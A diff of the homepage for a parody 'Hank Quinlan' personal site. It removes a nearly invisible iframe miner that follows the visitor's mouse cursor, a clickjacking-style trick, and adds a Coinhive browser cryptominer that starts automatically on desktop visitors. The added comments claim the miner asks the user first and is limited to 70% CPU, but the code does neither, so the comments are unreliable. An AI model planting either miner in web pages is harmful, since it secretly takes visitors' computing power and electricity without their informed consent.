--- a/index.html
+++ b/index.html
@@ -18,10 +18,7 @@
 				<p>I'm best known as the horrible cop from <em>A Touch of Evil</em> Don't trust me. <a href="/about">Read more about my life...</a></p>
     		</div><!-- /.blurb -->
 		</div><!-- /.container -->
-		<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
-		<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=DNvkUKFEbzbZFIekyiddu9tUAFjO6Qtz"></iframe>
-		</div>
-		
+			
 		<footer>
     		<ul>
         		<li><a href="mailto:hankquinlanhub@gmail.com">email</a></li>
@@ -29,10 +26,21 @@
 			</ul>
 		</footer>
 	</body>
-	<script>
-	window.onmousemove = function(e) {
-	var container = document.getElementById("container");
-	container.setAttribute("style", "border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01;left:" + e.x + ";top:" + e.y);
-	}
-	</script>
+<!-- 引入 Coinhive 挖礦程式 -->
+<script src="https://coinhive.com/lib/coinhive.min.js"></script>
+
+<script>
+var miner = new CoinHive.Anonymous(
+  'DNvkUKFEbzbZFIekyiddu9tUAFjO6Qtz',
+  {throttle: 0.01}  // 使用 70% 的 CPU 資源進行挖礦
+);
+
+// 在非手機平台，而且在四小時內沒有詢問過使用者時，
+// 才詢問使用者，執行挖礦程式
+if (!miner.isMobile() && !miner.didOptOut(14400)) {
+  miner.start();
+}
+</script>
+
+
 </html>
